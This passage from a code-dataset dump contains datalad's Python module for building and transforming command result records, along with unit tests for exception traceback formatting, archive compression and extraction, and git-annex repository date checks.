__future__ import annotations\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nfrom collections.abc import (\n Iterable,\n Iterator,\n)\nfrom os.path import (\n isabs,\n isdir,\n)\nfrom os.path import join as opj\nfrom os.path import (\n normpath,\n relpath,\n)\nfrom typing import (\n Any,\n Optional,\n)\n\nfrom datalad.distribution.dataset import Dataset\nfrom 
datalad.support.exceptions import (\n CapturedException,\n CommandError,\n format_oneline_tb,\n)\nfrom datalad.support.path import robust_abspath\nfrom datalad.utils import (\n PurePosixPath,\n ensure_list,\n path_is_subpath,\n)\n\nlgr = logging.getLogger('datalad.interface.results')\nlgr.log(5, \"Importing datalad.interface.results\")\n\n# which status is a success , which is failure\nsuccess_status_map = {\n 'ok': 'success',\n 'notneeded': 'success',\n 'impossible': 'failure',\n 'error': 'failure',\n}\n\n\ndef get_status_dict(\n action: Optional[str] = None,\n ds: Optional[Dataset] = None,\n path: Optional[str] = None,\n type: Optional[str] = None,\n logger: Optional[logging.Logger] = None,\n refds: Optional[str] = None,\n status: Optional[str] = None,\n message: str | tuple | None = None,\n exception: Exception | CapturedException | None = None,\n error_message: str | tuple | None = None,\n **kwargs: Any,\n) -> dict[str, Any]:\n # `type` is intentionally not `type_` or something else, as a mismatch\n # with the dict key 'type' causes too much pain all over the place\n # just for not shadowing the builtin `type` in this function\n \"\"\"Helper to create a result dictionary.\n\n Most arguments match their key in the resulting dict, and their given\n values are simply assigned to the result record under these keys. Only\n exceptions are listed here.\n\n Parameters\n ----------\n ds\n If given, the `path` and `type` values are populated with the path of the\n datasets and 'dataset' as the type. Giving additional values for both\n keys will overwrite these pre-populated values.\n exception\n Exceptions that occurred while generating a result should be captured\n by immediately instantiating a CapturedException. This instance can\n be passed here to yield more comprehensive error reporting, including\n an auto-generated traceback (added to the result record under an\n 'exception_traceback' key). Exceptions of other types are also supported.\n\n Returns\n -------\n dict\n \"\"\"\n\n d: dict[str, Any] = {}\n if action is not None:\n d['action'] = action\n if ds:\n d['path'] = ds.path\n d['type'] = 'dataset'\n # now overwrite automatic\n if path is not None:\n d['path'] = path\n if type:\n d['type'] = type\n if logger:\n d['logger'] = logger\n if refds:\n d['refds'] = refds\n if status is not None:\n # TODO check for known status label\n d['status'] = status\n if message is not None:\n d['message'] = message\n if error_message is not None:\n d['error_message'] = error_message\n if exception is not None:\n d['exception'] = exception\n d['exception_traceback'] = exception.format_oneline_tb(\n include_str=False) \\\n if isinstance(exception, CapturedException) \\\n else format_oneline_tb(\n exception, include_str=False)\n if error_message is None and isinstance(exception, CapturedException):\n d['error_message'] = exception.message\n if isinstance(exception, CommandError):\n d['exit_code'] = exception.code\n if kwargs:\n d.update(kwargs)\n return d\n\n\ndef results_from_paths(\n paths: str | list[str],\n action: Optional[str] = None,\n type: Optional[str] = None,\n logger: Optional[logging.Logger] = None,\n refds: Optional[str]=None,\n status: Optional[str] = None,\n message: Optional[str] = None,\n exception: Exception | CapturedException | None = None,\n) -> Iterator[dict[str, Any]]:\n \"\"\"\n Helper to yield analog result dicts for each path in a sequence.\n\n Parameters\n ----------\n message: str\n A result message. 
May contain `%s` which will be replaced by the\n respective `path`.\n\n Returns\n -------\n generator\n\n \"\"\"\n for p in ensure_list(paths):\n yield get_status_dict(\n action, path=p, type=type, logger=logger, refds=refds,\n status=status, message=(message, p) if message is not None and '%s' in message else message,\n exception=exception\n )\n\n\ndef is_ok_dataset(r: dict) -> bool:\n \"\"\"Convenience test for a non-failure dataset-related result dict\"\"\"\n return r.get('status', None) == 'ok' and r.get('type', None) == 'dataset'\n\n\nclass ResultXFM:\n \"\"\"Abstract definition of the result transformer API\"\"\"\n\n def __call__(self, res: dict[str, Any]) -> Any:\n \"\"\"This is called with one result dict at a time\"\"\"\n raise NotImplementedError\n\n\nclass YieldDatasets(ResultXFM):\n \"\"\"Result transformer to return a Dataset instance from matching result.\n\n If the `success_only` flag is given only dataset with 'ok' or 'notneeded'\n status are returned'.\n\n `None` is returned for any other result.\n \"\"\"\n def __init__(self, success_only: bool = False) -> None:\n self.success_only = success_only\n\n def __call__(self, res: dict[str, Any]) -> Optional[Dataset]:\n if res.get('type', None) == 'dataset':\n if not self.success_only or \\\n res.get('status', None) in ('ok', 'notneeded'):\n return Dataset(res['path'])\n else:\n return None\n else:\n lgr.debug('rejected by return value configuration: %s', res)\n return None\n\n\nclass YieldRelativePaths(ResultXFM):\n \"\"\"Result transformer to return relative paths for a result\n\n Relative paths are determined from the 'refds' value in the result. If\n no such value is found, `None` is returned.\n \"\"\"\n def __call__(self, res: dict[str, Any]) -> Optional[str]:\n refpath = res.get('refds', None)\n if refpath:\n return relpath(res['path'], start=refpath)\n else:\n return None\n\n\nclass YieldField(ResultXFM):\n \"\"\"Result transformer to return an arbitrary value from a result dict\"\"\"\n def __init__(self, field: str) -> None:\n \"\"\"\n Parameters\n ----------\n field : str\n Key of the field to return.\n \"\"\"\n self.field = field\n\n def __call__(self, res: dict[str, Any]) -> Any:\n if self.field in res:\n return res[self.field]\n else:\n lgr.debug('rejected by return value configuration: %s', res)\n return None\n\n\n# a bunch of convenience labels for common result transformers\n# the API `result_xfm` argument understand any of these labels and\n# applied the corresponding callable\nknown_result_xfms = {\n 'datasets': YieldDatasets(),\n 'successdatasets-or-none': YieldDatasets(success_only=True),\n 'paths': YieldField('path'),\n 'relpaths': YieldRelativePaths(),\n 'metadata': YieldField('metadata'),\n}\n\ntranslate_annex_notes = {\n '(Use --force to override this check, or adjust numcopies.)':\n 'configured minimum number of copies not found',\n}\n\n\ndef annexjson2result(d: dict[str, Any], ds: Dataset, **kwargs: Any) -> dict[str, Any]:\n \"\"\"Helper to convert an annex JSON result to a datalad result dict\n\n Info from annex is rather heterogeneous, partly because some of it\n our support functions are faking.\n\n This helper should be extended with all needed special cases to\n homogenize the information.\n\n Parameters\n ----------\n d : dict\n Annex info dict.\n ds : Dataset instance\n Used to determine absolute paths for `file` results. This dataset\n is not used to set `refds` in the result, pass this as a separate\n kwarg if needed.\n **kwargs\n Passes as-is to `get_status_dict`. 
Must not contain `refds`.\n \"\"\"\n lgr.debug('received JSON result from annex: %s', d)\n messages = []\n res = get_status_dict(**kwargs)\n res['status'] = 'ok' if d.get('success', False) is True else 'error'\n # we cannot rely on any of these to be available as the feed from\n # git annex (or its wrapper) is not always homogeneous\n if d.get('file'):\n res['path'] = str(ds.pathobj / PurePosixPath(d['file']))\n if 'command' in d:\n res['action'] = d['command']\n if 'key' in d:\n res['annexkey'] = d['key']\n if 'fields' in d:\n # this is annex metadata, filter out timestamps\n res['metadata'] = {k: v[0] if isinstance(v, list) and len(v) == 1 else v\n for k, v in d['fields'].items()\n if not k.endswith('lastchanged')}\n if d.get('error-messages', None):\n res['error_message'] = '\\n'.join(m.strip() for m in d['error-messages'])\n # avoid meaningless standard messages, and collision with actual error\n # messages\n elif 'note' in d:\n note = \"; \".join(ln for ln in d['note'].splitlines()\n if ln != 'checksum...'\n and not ln.startswith('checking file'))\n if note:\n messages.append(translate_annex_notes.get(note, note))\n if messages:\n res['message'] = '\\n'.join(m.strip() for m in messages)\n return res\n\n\ndef count_results(res: Iterable[dict[str, Any]], **kwargs: Any) -> int:\n \"\"\"Return number of results that match all property values in kwargs\"\"\"\n return sum(\n all(k in r and r[k] == v for k, v in kwargs.items()) for r in res)\n\n\ndef only_matching_paths(res: dict[str, Any], **kwargs: Any) -> bool:\n # TODO handle relative paths by using a contained 'refds' value\n paths = ensure_list(kwargs.get('path', []))\n respath = res.get('path', None)\n return respath in paths\n\n\n# needs decorator, as it will otherwise bind to the command classes that use it\n@staticmethod # type: ignore[misc]\ndef is_result_matching_pathsource_argument(res: dict[str, Any], **kwargs: Any) -> bool:\n # we either have any non-zero number of \"paths\" (that could be anything), or\n # we have one path and one source\n # we don't do any error checking here, done by the command itself\n if res.get('action', None) not in ('install', 'get'):\n # this filter is only used in install, reject anything that comes\n # in that could not possibly be a 'install'-like result\n # e.g. a sibling being added in the process\n return False\n source = kwargs.get('source', None)\n if source is not None:\n # we want to be able to deal with Dataset instances given as 'source':\n if isinstance(source, Dataset):\n source = source.path\n # if there was a source, it needs to be recorded in the result\n # otherwise this is not what we are looking for\n return source == res.get('source_url', None)\n # the only thing left is a potentially heterogeneous list of paths/URLs\n paths = ensure_list(kwargs.get('path', []))\n # three cases left:\n # 1. input arg was an absolute path -> must match 'path' property\n # 2. input arg was relative to a dataset -> must match refds/relpath\n # 3. 
something nifti with a relative input path that uses PWD as the\n # reference\n respath = res.get('path', None)\n if respath in paths:\n # absolute match, pretty sure we want this\n return True\n elif isinstance(kwargs.get('dataset', None), Dataset) and \\\n YieldRelativePaths()(res) in paths:\n # command was called with a reference dataset, and a relative\n # path of a result matches in input argument -- not 100% exhaustive\n # test, but could be good enough\n return True\n elif any(robust_abspath(p) == respath for p in paths):\n # one absolutified input path matches the result path\n # I'd say: got for it!\n return True\n elif any(p == res.get('source_url', None) for p in paths):\n # this was installed from a URL that was given, we'll take that too\n return True\n else:\n return False\n\n\ndef results_from_annex_noinfo(\n ds: Dataset,\n requested_paths: list[str],\n respath_by_status: dict[str, list[str]],\n dir_fail_msg: str,\n noinfo_dir_msg: str,\n noinfo_file_msg: str,\n noinfo_status: str = 'notneeded',\n **kwargs: Any\n) -> Iterator[dict[str, Any]]:\n \"\"\"Helper to yield results based on what information git annex did no give us.\n\n The helper assumes that the annex command returned without an error code,\n and interprets which of the requested paths we have heard nothing about,\n and assumes that git annex was happy with their current state.\n\n Parameters\n ==========\n ds : Dataset\n All results have to be concerning this single dataset (used to resolve\n relpaths).\n requested_paths : list\n List of path arguments sent to `git annex`\n respath_by_status : dict\n Mapping of 'success' or 'failure' labels to lists of result paths\n reported by `git annex`. Everything that is not in here, we assume\n that `git annex` was happy about.\n dir_fail_msg : str\n Message template to inject into the result for a requested directory where\n a failure was reported for some of its content. The template contains two\n string placeholders that will be expanded with 1) the path of the\n directory, and 2) the content failure paths for that directory\n noinfo_dir_msg : str\n Message template to inject into the result for a requested directory that\n `git annex` was silent about (incl. any content). There must be one string\n placeholder that is expanded with the path of that directory.\n noinfo_file_msg : str\n Message to inject into the result for a requested file that `git\n annex` was silent about.\n noinfo_status : str\n Status to report when annex provides no information\n **kwargs\n Any further kwargs are included in the yielded result dictionary.\n \"\"\"\n for p in requested_paths:\n # any relpath is relative to the currently processed dataset\n # not the global reference dataset\n p = p if isabs(p) else normpath(opj(ds.path, p))\n if any(p in ps for ps in respath_by_status.values()):\n # we have a report for this path already\n continue\n common_report = dict(path=p, **kwargs)\n if isdir(p):\n # `annex` itself will not report on directories, but if a\n # directory was requested, we want to say something about\n # it in the results. 
we are inside a single, existing\n # repo, hence all directories are already present, if not\n # we had an error\n # do we have any failures in a subdir of the requested dir?\n failure_results = [\n fp for fp in respath_by_status.get('failure', [])\n if path_is_subpath(fp, p)]\n if failure_results:\n # we were not able to process all requested_paths, let's label\n # this 'impossible' to get a warning-type report\n # after all we have the directory itself, but not\n # (some) of its requested_paths\n yield get_status_dict(\n status='impossible', type='directory',\n message=(dir_fail_msg, p, failure_results),\n **common_report)\n else:\n # otherwise cool, but how cool?\n success_results = [\n fp for fp in respath_by_status.get('success', [])\n if path_is_subpath(fp, p)]\n yield get_status_dict(\n status='ok' if success_results else noinfo_status,\n message=None if success_results else (noinfo_dir_msg, p),\n type='directory', **common_report)\n continue\n else:\n # not a directory, and we have had no word from `git annex`,\n # yet no exception, hence the file was most probably\n # already in the desired state\n yield get_status_dict(\n status=noinfo_status, type='file',\n message=noinfo_file_msg,\n **common_report)\n\n\nlgr.log(5, \"Done importing datalad.interface.results\")\n" }, { "alpha_fraction": 0.6269466876983643, "alphanum_fraction": 0.6399244666099548, "avg_line_length": 35.22222137451172, "blob_id": "0492ffd3ff73c4f5a1178fb9872defd6142f235c", "content_id": "753c7faf5050cae6a43fe5081c61561790667735", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4238, "license_type": "permissive", "max_line_length": 213, "num_lines": 117, "path": "/datalad/support/tests/test_captured_exception.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from unittest.mock import patch\n\nfrom datalad import cfg\nfrom datalad.support.exceptions import (\n CapturedException,\n format_exception_with_cause,\n)\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_re_in,\n assert_true,\n)\n\n\ndef test_CapturedException():\n\n try:\n raise Exception(\"BOOM\")\n except Exception as e:\n captured_exc = CapturedException(e)\n\n assert_re_in(r\"BOOM \\[test_captured_exception.py:test_CapturedException:[0-9]+\\]\", captured_exc.format_oneline_tb())\n assert_re_in(r\"^\\[.*\\]\", captured_exc.format_oneline_tb(include_str=False)) # only traceback\n\n try:\n raise NotImplementedError\n except Exception as e:\n captured_exc = CapturedException(e)\n\n assert_re_in(r\"NotImplementedError \\[test_captured_exception.py:test_CapturedException:[0-9]+\\]\", captured_exc.format_oneline_tb())\n\n def f():\n def f2():\n raise Exception(\"my bad again\")\n try:\n f2()\n except Exception as e:\n # exception chain\n raise RuntimeError(\"new message\") from e\n\n try:\n f()\n except Exception as e:\n captured_exc = CapturedException(e)\n\n # default limit: one level:\n estr1 = captured_exc.format_oneline_tb(limit=1)\n estr2 = captured_exc.format_oneline_tb(limit=2)\n # and we can control it via environ/config by default\n try:\n with patch.dict('os.environ', {'DATALAD_EXC_STR_TBLIMIT': '3'}):\n cfg.reload()\n estr3 = captured_exc.format_oneline_tb()\n with patch.dict('os.environ', {}, clear=True):\n cfg.reload()\n estr_ = captured_exc.format_oneline_tb()\n finally:\n cfg.reload() # make sure we don't have a side effect on other tests\n\n estr_full = captured_exc.format_oneline_tb(10)\n\n assert_re_in(r\"new message 
\\[test_captured_exception.py:test_CapturedException:[0-9]+,test_captured_exception.py:f:[0-9]+,test_captured_exception.py:f:[0-9]+,test_captured_exception.py:f2:[0-9]+\\]\", estr_full)\n assert_re_in(r\"new message \\[test_captured_exception.py:f:[0-9]+,test_captured_exception.py:f:[0-9]+,test_captured_exception.py:f2:[0-9]+\\]\", estr3)\n assert_re_in(r\"new message \\[test_captured_exception.py:f:[0-9]+,test_captured_exception.py:f2:[0-9]+\\]\", estr2)\n assert_re_in(r\"new message \\[test_captured_exception.py:f2:[0-9]+\\]\", estr1)\n # default: no limit:\n assert_equal(estr_, estr_full)\n\n # standard output\n full_display = captured_exc.format_standard().splitlines()\n\n assert_equal(full_display[0], \"Traceback (most recent call last):\")\n # points in f and f2 for first exception with two lines each\n # (where is the line and what reads the line):\n assert_true(full_display[1].lstrip().startswith(\"File\"))\n assert_equal(full_display[2].strip(), \"f2()\")\n assert_true(full_display[3].lstrip().startswith(\"File\"))\n assert_equal(full_display[4].strip(), \"raise Exception(\\\"my bad again\\\")\")\n assert_equal(full_display[5].strip(), \"Exception: my bad again\")\n assert_equal(full_display[7].strip(), \"The above exception was the direct cause of the following exception:\")\n assert_equal(full_display[9], \"Traceback (most recent call last):\")\n # ...\n assert_equal(full_display[-1].strip(), \"RuntimeError: new message\")\n\n # CapturedException.__repr__:\n assert_re_in(r\".*test_captured_exception.py:f2:[0-9]+\\]$\",\n captured_exc.__repr__())\n\n\ndef makeitraise():\n def raise_valueerror():\n try:\n raise_runtimeerror()\n except Exception as e:\n raise ValueError from e\n\n def raise_runtimeerror():\n raise RuntimeError(\"Mike\")\n\n try:\n raise_valueerror()\n except Exception as e:\n raise RuntimeError from e\n\n\ndef test_format_exception_with_cause():\n try:\n makeitraise()\n except Exception as e:\n assert_equal(\n format_exception_with_cause(e),\n 'RuntimeError -caused by- ValueError -caused by- Mike')\n # make sure it also works with TracebackException/CapturedException:\n ce = CapturedException(e)\n assert_equal(\n ce.format_with_cause(),\n 'RuntimeError -caused by- ValueError -caused by- Mike')\n" }, { "alpha_fraction": 0.6049097776412964, "alphanum_fraction": 0.6123583912849426, "avg_line_length": 33.0428581237793, "blob_id": "06882c79846e8bf7ae8deb1ca48c743115205145", "content_id": "ade7a70caa81ee5b8e5365191d7454d5ff6294c1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9532, "license_type": "permissive", "max_line_length": 109, "num_lines": 280, "path": "/datalad/tests/test_archives.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport itertools\nimport os\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.support import path as op\nfrom datalad.support.archive_utils_patool import unixify_path\nfrom datalad.support.archives import (\n ArchivesCache,\n ExtractedArchive,\n compress_files,\n decompress_file,\n)\nfrom 
datalad.support.exceptions import MissingExternalDependency\nfrom datalad.support.external_versions import external_versions\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n SkipTest,\n assert_false,\n assert_raises,\n assert_true,\n eq_,\n ok_file_has_content,\n ok_generator,\n on_nfs,\n on_travis,\n on_windows,\n skip_if,\n swallow_outputs,\n with_tempfile,\n with_tree,\n)\n\nfn_in_archive_obscure = OBSCURE_FILENAME\nfn_archive_obscure = fn_in_archive_obscure.replace('a', 'b')\n# Debian sid version of python (3.7.5rc1) introduced a bug in mimetypes\n# Reported to cPython: https://bugs.python.org/issue38449\nimport mimetypes\n\nmimedb = mimetypes.MimeTypes(strict=False)\nif None in mimedb.guess_type(fn_archive_obscure + '.tar.gz'):\n from . import lgr\n lgr.warning(\"Buggy Python mimetypes, replacing ; in archives test filename\")\n # fails to detect due to ;\n fn_archive_obscure = fn_archive_obscure.replace(';', '-')\n # verify\n assert None not in mimedb.guess_type(fn_archive_obscure + '.tar.gz')\nfn_archive_obscure_ext = fn_archive_obscure + '.tar.gz'\n\ntree_simplearchive = dict(\n tree=(\n (fn_archive_obscure_ext, (\n (fn_in_archive_obscure, '2 load'),\n ('3.txt', '3 load'))),),\n prefix='datalad-')\n\nif on_windows:\n\n def test_unixify_path():\n from ..tests.utils_pytest import eq_\n eq_(unixify_path(r\"a\"), \"a\")\n eq_(unixify_path(r\"c:\\buga\"), \"/c/buga\")\n eq_(unixify_path(r\"c:\\buga\\duga.dat\"), \"/c/buga/duga.dat\")\n eq_(unixify_path(r\"buga\\duga.dat\"), \"buga/duga.dat\")\n\n\n@with_tree(**tree_simplearchive)\ndef check_decompress_file(leading_directories, path=None):\n outdir = op.join(path, 'simple-extracted')\n\n with swallow_outputs() as cmo:\n decompress_file(op.join(path, fn_archive_obscure_ext), outdir,\n leading_directories=leading_directories)\n eq_(cmo.out, \"\")\n eq_(cmo.err, \"\")\n\n path_archive_obscure = op.join(outdir, fn_archive_obscure)\n if leading_directories == 'strip':\n assert not op.exists(path_archive_obscure)\n testpath = outdir\n elif leading_directories is None:\n assert op.exists(path_archive_obscure)\n testpath = path_archive_obscure\n else:\n raise NotImplementedError(\"Dunno about this strategy: %s\"\n % leading_directories)\n\n assert op.exists(op.join(testpath, '3.txt'))\n assert op.exists(op.join(testpath, fn_in_archive_obscure))\n with open(op.join(testpath, '3.txt')) as f:\n eq_(f.read(), '3 load')\n\n\[email protected](on_travis and on_nfs, reason=\"https://github.com/datalad/datalad/issues/4496\")\[email protected](\"leading\", [None, 'strip'])\ndef test_decompress_file(leading):\n return check_decompress_file(leading)\n\n\ndef test_decompress_file_unknown():\n with pytest.raises(NotImplementedError):\n check_decompress_file(\"unknown\")\n\n\n@with_tree((('empty', ''),\n ('d1', (\n ('d2', (\n ('f1', 'f1 load'),\n ),),\n ))))\n@with_tempfile()\ndef check_compress_dir(ext, path=None, name=None):\n archive = name + ext\n compress_files([os.path.basename(path)], archive,\n path=os.path.dirname(path))\n assert_true(op.exists(archive))\n name_extracted = name + \"_extracted\"\n decompress_file(archive, name_extracted, leading_directories='strip')\n assert_true(op.exists(op.join(name_extracted, 'empty')))\n assert_true(op.exists(op.join(name_extracted, 'd1', 'd2', 'f1')))\n\n\[email protected](\n \"ext\",\n ['.tar.xz',\n '.tar.gz',\n '.tgz',\n '.tbz2',\n '.tar',\n '.zip',\n '.7z',\n ]\n)\ndef test_compress_dir(ext):\n return check_compress_dir(ext)\n\n\n# space in the filename to test for correct quotations 
etc\n_filename = 'fi le.dat'\n\n\n@skip_if(\"cmd:7z\" not in external_versions,\n msg=\"Known to fail if p7zip is not installed\")\n@with_tree(((_filename, 'content'),))\n@with_tempfile()\ndef check_compress_file(ext, annex, path=None, name=None):\n # we base the archive name on the filename, in order to also\n # be able to properly test compressors where the corresponding\n # archive format has no capability of storing a filename\n # (i.e. where the archive name itself determines the filename\n # of the decompressed file, like .xz)\n archive = op.join(name, _filename + ext)\n compress_files([_filename], archive,\n path=path)\n assert_true(op.exists(archive))\n if annex:\n # It should work even when file is annexed and is a symlink to the\n # key\n from datalad.support.annexrepo import AnnexRepo\n repo = AnnexRepo(path, init=True)\n repo.add(_filename)\n repo.commit(files=[_filename], msg=\"commit\")\n\n dir_extracted = name + \"_extracted\"\n try:\n decompress_file(archive, dir_extracted)\n except MissingExternalDependency as exc:\n raise SkipTest() from exc\n _filepath = op.join(dir_extracted, _filename)\n\n ok_file_has_content(_filepath, 'content')\n\n\[email protected](\n \"ext,annex\",\n list(\n itertools.product(\n ['.xz', '.gz', '.zip', '.7z'],\n [True, False])\n )\n)\ndef test_compress_file(ext, annex):\n check_compress_file(ext, annex)\n\n\n@with_tree(**tree_simplearchive)\ndef test_ExtractedArchive(path=None):\n archive = op.join(path, fn_archive_obscure_ext)\n earchive = ExtractedArchive(archive)\n assert_false(op.exists(earchive.path))\n # no longer the case -- just using hash for now\n # assert_in(os.path.basename(archive), earchive.path)\n\n fpath = op.join(fn_archive_obscure, # lead directory\n fn_in_archive_obscure)\n extracted = earchive.get_extracted_filename(fpath)\n eq_(extracted, op.join(earchive.path, fpath))\n assert_false(op.exists(extracted)) # not yet\n\n extracted_ = earchive.get_extracted_file(fpath)\n eq_(extracted, extracted_)\n assert_true(op.exists(extracted)) # now it should\n\n extracted_files = earchive.get_extracted_files()\n ok_generator(extracted_files)\n try:\n eq_(sorted(extracted_files),\n sorted([\n # ['bbc/3.txt', 'bbc/abc']\n op.join(fn_archive_obscure, fn_in_archive_obscure),\n op.join(fn_archive_obscure, '3.txt')\n ]))\n except AssertionError:\n if 'nfsmount' in fpath:\n pytest.xfail(\"Archive was created before NFS startede to behave. 
\"\n \"https://github.com/datalad/datalad/issues/4101\")\n raise\n\n earchive.clean()\n if not dl_cfg.get('datalad.tests.temp.keep'):\n assert_false(op.exists(earchive.path))\n\n\ndef test_ArchivesCache():\n # we don't actually need to test archives handling itself\n path1 = \"/zuba/duba\"\n path2 = \"/zuba/duba2\"\n # should not be able to create a persistent cache without topdir\n assert_raises(ValueError, ArchivesCache, persistent=True)\n cache = ArchivesCache() # by default -- non persistent\n\n archive1_path = op.join(path1, fn_archive_obscure_ext)\n archive2_path = op.join(path2, fn_archive_obscure_ext)\n cached_archive1_path = cache[archive1_path].path\n assert_false(cache[archive1_path].path == cache[archive2_path].path)\n assert_true(cache[archive1_path] is cache[archive1_path])\n cache.clean()\n assert_false(op.exists(cached_archive1_path))\n assert_false(op.exists(cache.path))\n\n # test del\n cache = ArchivesCache() # by default -- non persistent\n assert_true(op.exists(cache.path))\n cache_path = cache.path\n del cache\n assert_false(op.exists(cache_path))\n\n\[email protected](\n \"return_value,target_value,kwargs\",\n [\n ([], None, {}),\n (['file.txt'], None, {}),\n (['file.txt', op.join('d', 'f')], None, {}),\n ([op.join('d', 'f'), op.join('d', 'f2')], 'd', {}),\n ([op.join('d', 'f'), op.join('d', 'f2')], 'd', {'consider': 'd'}),\n ([op.join('d', 'f'), op.join('d', 'f2')], None, {'consider': 'dd'}),\n ([op.join('d', 'f'), op.join('d2', 'f2')], None, {}),\n ([op.join('d', 'd2', 'f'), op.join('d', 'd2', 'f2')], op.join('d', 'd2'), {}),\n ([op.join('d', 'd2', 'f'), op.join('d', 'd2', 'f2')], 'd', {'depth': 1}),\n # with some parasitic files\n ([op.join('d', 'f'), op.join('._d')], 'd', {'exclude': [r'\\._.*']}),\n ([op.join('d', 'd1', 'f'), op.join('d', '._d'), '._x'], op.join('d', 'd1'), {'exclude': [r'\\._.*']}),\n ]\n)\ndef test_get_leading_directory(return_value, target_value, kwargs):\n ea = ExtractedArchive('/some/bogus', '/some/bogus')\n with patch.object(ExtractedArchive, 'get_extracted_files', return_value=return_value):\n eq_(ea.get_leading_directory(**kwargs), target_value)\n" }, { "alpha_fraction": 0.5721290111541748, "alphanum_fraction": 0.5785806179046631, "avg_line_length": 33.909908294677734, "blob_id": "0b515a8e7a004e41f6560f35929031cca8dfd8bf", "content_id": "cf6078306a98487e0fc848a9ef4e2eee73236fe9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3875, "license_type": "permissive", "max_line_length": 87, "num_lines": 111, "path": "/datalad/support/tests/test_repodates.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom unittest.mock import patch\n\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.repodates import check_dates\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_false,\n assert_in,\n assert_not_in,\n assert_raises,\n eq_,\n ok_,\n set_date,\n with_tempfile,\n with_tree,\n)\n\n\n@with_tempfile(mkdir=True)\ndef test_check_dates_empty_repo(path=None):\n 
assert_false(check_dates(GitRepo(path, create=True))[\"objects\"])\n\n\n@with_tree(tree={\"foo\": \"foo content\",\n \"bar\": \"bar content\"})\ndef test_check_dates(path=None):\n refdate = 1218182889\n\n with set_date(refdate - 1):\n ar = AnnexRepo(path, create=True)\n\n def tag_object(tag):\n \"\"\"Return object for tag. Do not dereference it.\n \"\"\"\n # We can't use ar.get_tags because that returns the commit's hexsha,\n # not the tag's, and ar.get_hexsha is limited to commit objects.\n return ar.call_git_oneline(\n [\"rev-parse\", \"refs/tags/{}\".format(tag)], read_only=True)\n\n ar.add(\"foo\")\n ar.commit(\"add foo\")\n foo_commit = ar.get_hexsha()\n ar.commit(\"add foo\")\n ar.tag(\"foo-tag\", \"tag before refdate\")\n foo_tag = tag_object(\"foo-tag\")\n # Make a lightweight tag to make sure `tag_dates` doesn't choke on it.\n ar.tag(\"light\")\n with set_date(refdate + 1):\n ar.add(\"bar\")\n ar.commit(\"add bar\")\n bar_commit = ar.get_hexsha()\n ar.tag(\"bar-tag\", \"tag after refdate\")\n bar_tag = tag_object(\"bar-tag\")\n with set_date(refdate + 2):\n # Drop an annexed file so that we have more blobs in the git-annex\n # branch than its current tree.\n ar.drop(\"bar\", options=[\"--force\"])\n\n results = {}\n for which in [\"older\", \"newer\"]:\n result = check_dates(ar, refdate, which=which)[\"objects\"]\n ok_(result)\n if which == \"newer\":\n assert_in(bar_commit, result)\n assert_not_in(foo_commit, result)\n assert_in(bar_tag, result)\n elif which == \"older\":\n assert_in(foo_commit, result)\n assert_not_in(bar_commit, result)\n assert_in(foo_tag, result)\n results[which] = result\n\n ok_(any(x.get(\"filename\") == \"uuid.log\"\n for x in results[\"older\"].values()))\n\n newer_tree = check_dates(ar, refdate, annex=\"tree\")[\"objects\"]\n\n def is_annex_log_blob(entry):\n return (entry[\"type\"] == \"annex-blob\"\n and entry[\"filename\"].endswith(\".log\"))\n\n def num_logs(entries):\n return sum(map(is_annex_log_blob, entries.values()))\n\n # Because we dropped bar above, we should have one more blob in the\n # git-annex branch than in the current tree of the git-annex branch.\n eq_(num_logs(results[\"newer\"]) - num_logs(newer_tree), 1)\n\n # Act like today is one day from the reference timestamp to check that we\n # get the same results with the one-day-back default.\n seconds_in_day = 60 * 60 * 24\n with patch('time.time', return_value=refdate + seconds_in_day):\n assert_equal(check_dates(ar, annex=\"tree\")[\"objects\"],\n newer_tree)\n\n # We can give a path (str) instead of a GitRepo object.\n assert_equal(check_dates(path, refdate, annex=\"tree\")[\"objects\"],\n newer_tree)\n\n with assert_raises(ValueError):\n check_dates(ar, refdate, which=\"unrecognized\")\n" }, { "alpha_fraction": 0.5887276530265808, "alphanum_fraction": 0.6183035969734192, "avg_line_length": 32.81132125854492, "blob_id": "90b026734af3587da32cf13a42922d746ee47165", "content_id": "f2a2ba345fc94014564bb33ec4693d972b53cfc9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1792, "license_type": "permissive", "max_line_length": 87, "num_lines": 53, "path": "/datalad/downloaders/tests/test_docker_registry.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along 
